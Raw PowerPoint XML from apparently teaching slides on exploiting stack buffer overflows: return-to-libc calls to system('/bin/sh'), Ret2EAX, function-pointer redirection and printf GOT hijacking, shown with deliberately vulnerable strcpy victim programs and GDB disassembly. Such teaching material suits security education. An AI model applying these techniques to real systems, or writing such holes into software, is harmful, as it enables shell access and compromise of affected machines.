              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>);  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ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>= &amp;function;  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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>buff[64]; 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/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>[1]);  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(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>[2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>]);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9254" y="45720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if we can redirect the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to the system function, for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ystem (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>[2])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Redirecting Function Pointers – Got a shell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924175"/>
            <a:ext cx="8372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0" y="4724400"/>
            <a:ext cx="443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0x08048360 – address of the system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Techniques to overcome buffer address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Ret2EAX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Ret2PopRet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Off-by-one-error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Redirecting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Pointers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 pointers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 pointers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Jump to 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en-US" dirty="0"/>
              <a:t>Spawn a shell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Hijack the Global Offset Table (GOT)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Spawn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shell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lectures: payload is on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Systems may not run code on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Non executable stack problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solutions: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umping to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (e.g. system call)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hijacking GOT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ASLR is turned off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GDB, ASLR is turned off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will run our victims within GDB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Victims compiled with –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-stack-protector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Otherwise, local variables stack position may be randomized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Techniques to overcome buffer address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ret2EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ret2PopRet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Off-by-one-error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Redirecting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Pointers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 pointers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 pointers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Jump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Spawn a shell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Hijack the Global Offset Table (GOT)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Spawn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shell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14625"/>
            <a:ext cx="28479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Victim’s Assembly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524000"/>
            <a:ext cx="32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080483e4 &lt;main&gt;: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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sub    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$0x10,%esp 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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0xc(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax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add    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$0x4,%eax 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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax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  %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>eax,0x4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp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lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-0x5(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax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  </a:t>
            </a:r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call   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy@plt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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$0x0,%eax </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>leave   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ret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Victim’s program stack before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64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 add to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc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Old EBP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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1]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27432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23738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45720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42026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EBP-5</a:t>
            </a:r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 flipV="1">
            <a:off x="2895600" y="3940444"/>
            <a:ext cx="457200" cy="21232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buffer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45951" y="2779067"/>
            <a:ext cx="1587795" cy="1792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Buffer (5 bytes)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1600200"/>
            <a:ext cx="58676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Exploit buffer overflow and modify the return address?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about pointing the return address to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function?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call a system function “system”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Passing “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” to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Exploit buffer overflow to  write this argument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an evil input?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2286000"/>
            <a:ext cx="6934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0" y="2286000"/>
            <a:ext cx="0" cy="838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76800" y="2286000"/>
            <a:ext cx="0" cy="838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2286000"/>
            <a:ext cx="0" cy="838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4895" y="32004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uffer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200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25146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200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address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239000" y="2286000"/>
            <a:ext cx="0" cy="838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3155" y="252626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2514600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3446" y="25146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25146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343400"/>
            <a:ext cx="6478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bytes for input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bytes to overflow the EBP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bytes of return address to the system call defined in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc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FAKE return address after running the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function requires an argument (e.g. “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”) to run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environment variable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76575"/>
            <a:ext cx="4857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4953000"/>
            <a:ext cx="519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BINSH will be used as an argument for the system call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ddresses of system and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>env</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a: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4886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14668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6315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input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2286000"/>
            <a:ext cx="6934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0" y="2286000"/>
            <a:ext cx="0" cy="838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76800" y="2286000"/>
            <a:ext cx="0" cy="838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2286000"/>
            <a:ext cx="0" cy="838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4895" y="32004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uffer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200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25146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200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address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239000" y="2286000"/>
            <a:ext cx="0" cy="838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3155" y="252626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2514600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3446" y="25146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25146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Victim’s program stack after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2779067"/>
            <a:ext cx="1600200" cy="649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 add to system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3429000"/>
            <a:ext cx="1600200" cy="4930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AAAA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36459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3276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56271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5257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45951" y="3922067"/>
            <a:ext cx="1587795" cy="1792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Buffer (5 bytes)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219200" y="2133600"/>
            <a:ext cx="1600200" cy="649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1559867"/>
            <a:ext cx="1600200" cy="649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Arg1 to system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648200" y="1884833"/>
            <a:ext cx="2438400" cy="782167"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -121096"/>
              <a:gd name="adj2" fmla="val -400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 of the environment variable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572000" y="3027833"/>
            <a:ext cx="2438400" cy="782167"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -121096"/>
              <a:gd name="adj2" fmla="val -400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 of the system function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133600"/>
            <a:ext cx="90963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505200" y="2334928"/>
            <a:ext cx="14478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0" y="2334928"/>
            <a:ext cx="1447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20114" y="2334928"/>
            <a:ext cx="41388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4973854" y="5334000"/>
            <a:ext cx="1579345" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -154517"/>
              <a:gd name="adj2" fmla="val -129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 a shell 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crashed after exit from shell?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61150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4562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5105400"/>
            <a:ext cx="3687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0x454b4146?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FAKE in hex:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F – 46, A – 41, K – 45, E - 45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Ret2EAX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Do not know the address of the buff.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>EAX register contains the return value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>In some cases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>returning to EAX will be helpful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key idea: most binaries have call *%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Strategy: Override the return address by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the address of the call *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> instruction!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Benefit: No worries about the buffer’s address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Techniques to overcome buffer address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Ret2EAX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Ret2PopRet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Off-by-one-error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Redirecting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Pointers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String pointers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 pointers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Jump to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libc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Spawn a shell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Hijack the Global Offset Table (GOT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spawn a 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Offset Table (GOT)?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redirects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>position independent address calculations to an absolute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>located in the .got section of an ELF executable or shared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
          </a:p>
          <a:p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the final (absolute) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>location of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a function calls symbol, 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in dynamically linked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6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Victim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738313"/>
            <a:ext cx="50387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Victim’s program stack before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64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 add to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc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Old EBP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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1]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27432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23738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 flipV="1">
            <a:off x="2895600" y="3940444"/>
            <a:ext cx="457200" cy="21232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buffer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45951" y="3352800"/>
            <a:ext cx="1587795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Buffer (10 bytes)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1600200"/>
            <a:ext cx="54633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Strategy for the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy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about pointing the pointer to a GOT entry?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to the GOT entry of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf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ointer is not pointing to Array anymore!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 err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is no problem. It will print something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Strategy for the second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy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assing the address of the system as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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GOT’s entry of </a:t>
            </a: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now points to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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> would not work as expected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Instead, it will call the system!!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19200" y="2743200"/>
            <a:ext cx="16002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Pointer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(local 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745042" y="3188732"/>
            <a:ext cx="474158" cy="13070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0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf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233738"/>
            <a:ext cx="6124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system?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94109"/>
            <a:ext cx="4886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after the first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64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 add to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc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Old EBP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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1]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27432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23738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 flipV="1">
            <a:off x="2895600" y="3940444"/>
            <a:ext cx="457200" cy="21232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buffer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45951" y="3352800"/>
            <a:ext cx="1587795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Buffer (10 bytes)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4445" y="3940076"/>
            <a:ext cx="54633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Strategy for the first </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy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about pointing the pointer to a GOT entry?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to the GOT entry of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf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ointer is not pointing to Array anymore!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 err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is no problem. It will print something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2743200"/>
            <a:ext cx="16002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Pointer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(local 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745042" y="3188732"/>
            <a:ext cx="474158" cy="13070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334435" y="3253777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33746" y="2895600"/>
            <a:ext cx="6234054" cy="439735"/>
            <a:chOff x="2833746" y="2895600"/>
            <a:chExt cx="6234054" cy="439735"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Right Arrow 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2833746" y="2922069"/>
              <a:ext cx="1052454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6200" y="2895600"/>
              <a:ext cx="2326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GOT entry of the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>printf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212799" y="3048000"/>
              <a:ext cx="734228" cy="1797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7027" y="2966003"/>
              <a:ext cx="212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Address of the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>printf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4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victim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738313"/>
            <a:ext cx="50387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after the second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64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 add to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc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Old EBP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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1]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27432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23738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 flipV="1">
            <a:off x="2895600" y="3940444"/>
            <a:ext cx="457200" cy="21232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buffer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45951" y="3352800"/>
            <a:ext cx="1587795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Buffer (10 bytes)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3886200"/>
            <a:ext cx="55499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Strategy for the second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy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 the address of the system function as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[2]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GOT entry of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is corrupted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GOT entry points to the system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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is replaced by the system function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2743200"/>
            <a:ext cx="16002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Pointer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(local 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33746" y="2831068"/>
            <a:ext cx="6248748" cy="646331"/>
            <a:chOff x="2833746" y="2831068"/>
            <a:chExt cx="6248748" cy="646331"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Right Arrow 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2833746" y="2895600"/>
              <a:ext cx="900054" cy="2550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831068"/>
              <a:ext cx="2326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GOT entry of the </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>printf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019800" y="2944492"/>
              <a:ext cx="734228" cy="1797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1800" y="2831068"/>
              <a:ext cx="2300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Address of the system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1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attack the GOT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362200"/>
            <a:ext cx="82486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1371600" y="2133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334000" y="2133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21336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0594" y="1752600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Argv</a:t>
            </a:r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62600" y="2133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696325" y="2138814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2600" y="2133600"/>
            <a:ext cx="313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01594" y="1752600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Argv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962400"/>
            <a:ext cx="71328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got the shell –  but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 1: Array: not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was the first string in our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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 err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was redirected to the system function as if system(“Array…”);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Array is not  a valid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if we create a command called Array?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victim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412081"/>
            <a:ext cx="29988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function(char*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char buffer[80];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(buffer, 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function(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0900" y="1447800"/>
            <a:ext cx="5766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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>disass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dump of assembler code for function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   0x080483e4 &lt;+0&gt;:	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   0x080483e5 &lt;+1&gt;:	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   0x080483e7 &lt;+3&gt;:	sub    $0x58,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   0x080483ea &lt;+6&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    0x8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp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 0x080483ed &lt;+9&gt;:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    %eax,0x4(%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   0x080483f1 &lt;+13&gt;:	lea    -0x50(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp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 0x080483f4 &lt;+16&gt;:	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   0x080483f7 &lt;+19&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   0x080483fc &lt;+24&gt;:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   0x080483fd &lt;+25&gt;:	ret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5638800"/>
            <a:ext cx="58694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char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> ( char * destination, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0"/>
              <a:t> char * source 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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> store the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>result</a:t>
            </a:r>
            <a:r>
